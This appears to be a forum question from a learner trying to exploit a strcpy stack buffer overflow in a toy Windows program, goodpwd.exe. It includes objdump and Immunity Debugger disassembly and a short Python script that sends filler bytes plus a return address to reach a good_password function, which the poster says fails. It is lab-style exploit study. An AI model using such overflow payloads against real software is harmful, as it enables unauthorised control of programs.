I'm facing an issue when trying to exploit the buffer overflow in goodpwd.exe.
This is my environment:
- Virtual box with windows7
- MSYS2 32bit
- Immunity debugger
My objdump output:
004015ec <__Z11bf_overflowPc>:
4015ec: 55 push ebp
4015ed: 89 e5 mov ebp,esp
4015ef: 83 ec 28 sub esp,0x28
4015f2: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]
4015f5: 89 44 24 04 mov DWORD PTR [esp+0x4],eax
4015f9: 8d 45 ee lea eax,[ebp-0x12]
4015fc: 89 04 24 mov DWORD PTR [esp],eax
4015ff: e8 e4 6b 00 00 call 4081e8 <_strcpy>
401604: b8 00 00 00 00 mov eax,0x0
401609: c9 leave
40160a: c3 ret
0040160b <__Z13good_passwordv>:
40160b: 55 push ebp
40160c: 89 e5 mov ebp,esp
40160e: 83 ec 18 sub esp,0x18
401611: c7 04 24 44 a0 40 00 mov DWORD PTR [esp],0x40a044
401618: e8 93 ff ff ff call 4015b0 <__ZL6printfPKcz>
40161d: c7 04 24 60 a0 40 00 mov DWORD PTR [esp],0x40a060
401624: e8 87 ff ff ff call 4015b0 <__ZL6printfPKcz>
401629: 90 nop
40162a: c9 leave
40162b: c3 ret
0040162c <_main>:
40162c: 55 push ebp
40162d: 89 e5 mov ebp,esp
40162f: 83 e4 f0 and esp,0xfffffff0
401632: 83 ec 20 sub esp,0x20
401635: e8 66 01 00 00 call 4017a0 <___main>
40163a: c7 44 24 1c 00 00 00 mov DWORD PTR [esp+0x1c],0x0
401641: 00
401642: c7 04 24 81 a0 40 00 mov DWORD PTR [esp],0x40a081
401649: e8 62 ff ff ff call 4015b0 <__ZL6printfPKcz>
40164e: 8b 45 0c mov eax,DWORD PTR [ebp+0xc]
401651: 83 c0 04 add eax,0x4
401654: 8b 00 mov eax,DWORD PTR [eax]
401656: 89 04 24 mov DWORD PTR [esp],eax
401659: e8 8e ff ff ff call 4015ec <__Z11bf_overflowPc>
40165e: 83 7c 24 1c 01 cmp DWORD PTR [esp+0x1c],0x1
401663: 75 07 jne 40166c <_main+0x40>
401665: e8 a1 ff ff ff call 40160b <__Z13good_passwordv>
40166a: eb 0c jmp 401678 <_main+0x4c>
40166c: c7 04 24 9d a0 40 00 mov DWORD PTR [esp],0x40a09d
401673: e8 38 ff ff ff call 4015b0 <__ZL6printfPKcz>
401678: c7 04 24 b2 a0 40 00 mov DWORD PTR [esp],0x40a0b2
40167f: e8 2c ff ff ff call 4015b0 <__ZL6printfPKcz>
401684: b8 00 00 00 00 mov eax,0x0
401689: c9 leave
40168a: c3
Immunity Debugger output:
00EE15EC /$ 55 PUSH EBP
00EE15ED |. 89E5 MOV EBP,ESP
00EE15EF |. 83EC 28 SUB ESP,28
00EE15F2 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
00EE15F5 |. 894424 04 MOV DWORD PTR SS:[ESP+4],EAX ; |
00EE15F9 |. 8D45 EE LEA EAX,DWORD PTR SS:[EBP-12] ; |
00EE15FC |. 890424 MOV DWORD PTR SS:[ESP],EAX ; |
00EE15FF |. E8 E46B0000 CALL <JMP.&msvcrt.strcpy> ; \strcpy
00EE1604 |. B8 00000000 MOV EAX,0
00EE1609 |. C9 LEAVE
00EE160A \. C3 RETN
00EE160B /$ 55 PUSH EBP
00EE160C |. 89E5 MOV EBP,ESP
00EE160E |. 83EC 18 SUB ESP,18
00EE1611 |. C70424 44A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA044 ; ASCII "Valid password supplied
"
00EE1618 |. E8 93FFFFFF CALL goodpwd.00EE15B0
00EE161D |. C70424 60A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA060 ; ASCII "This is good_password function
"
00EE1624 |. E8 87FFFFFF CALL goodpwd.00EE15B0
00EE1629 |. 90 NOP
00EE162A |. C9 LEAVE
00EE162B \. C3 RETN
00EE162C /$ 55 PUSH EBP
00EE162D |. 89E5 MOV EBP,ESP
00EE162F |. 83E4 F0 AND ESP,FFFFFFF0
00EE1632 |. 83EC 20 SUB ESP,20
00EE1635 |. E8 66010000 CALL goodpwd.00EE17A0
00EE163A |. C74424 1C 0000>MOV DWORD PTR SS:[ESP+1C],0
00EE1642 |. C70424 81A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA081 ; ASCII "You are in goodpwd.exe now
"
00EE1649 |. E8 62FFFFFF CALL goodpwd.00EE15B0
00EE164E |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
00EE1651 |. 83C0 04 ADD EAX,4
00EE1654 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
00EE1656 |. 890424 MOV DWORD PTR SS:[ESP],EAX
00EE1659 |. E8 8EFFFFFF CALL goodpwd.00EE15EC
00EE165E |. 837C24 1C 01 CMP DWORD PTR SS:[ESP+1C],1
00EE1663 |. 75 07 JNZ SHORT goodpwd.00EE166C
00EE1665 |. E8 A1FFFFFF CALL goodpwd.00EE160B
00EE166A |. EB 0C JMP SHORT goodpwd.00EE1678
00EE166C |> C70424 9DA0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA09D ; ASCII "Invalid Password!!!
"
00EE1673 |. E8 38FFFFFF CALL goodpwd.00EE15B0
00EE1678 |> C70424 B2A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA0B2 ; ASCII "Quitting sample1.exe
"
00EE167F |. E8 2CFFFFFF CALL goodpwd.00EE15B0
00EE1684 |. B8 00000000 MOV EAX,0
00EE1689 |. C9 LEAVE
00EE168A \. C3 RETN
As we can see, the addresses already differ.
Taking the objdump addresses into consideration and using a Python script like the one below, it never works; it seems I can't jump correctly to the goodpwd function.
from importlib.resources import path
import os
import sys
# Argument string handed to goodpwd.exe: 22 filler characters followed by
# a three-character suffix, assembled here as a plain str.
filler = "\x41" * 22
payload = filler + "\x0b\x16\x40"
# Command line for the target; os.system passes it to the shell as-is.
command = "goodpwd.exe {}".format(payload)
# `path` here is the object imported from importlib.resources, not a file path.
print(path)
print(command)
os.system(command)
I don't know why Immunity Debugger shows different addresses compared with objdump, but the Python script is not working. When using helper.cpp and changing the address to the one mentioned in the objdump output, it also fails.
Any suggestions? Is this related to running in a virtual machine, or to using MSYS2 instead of the MinGW compiler?
Thank you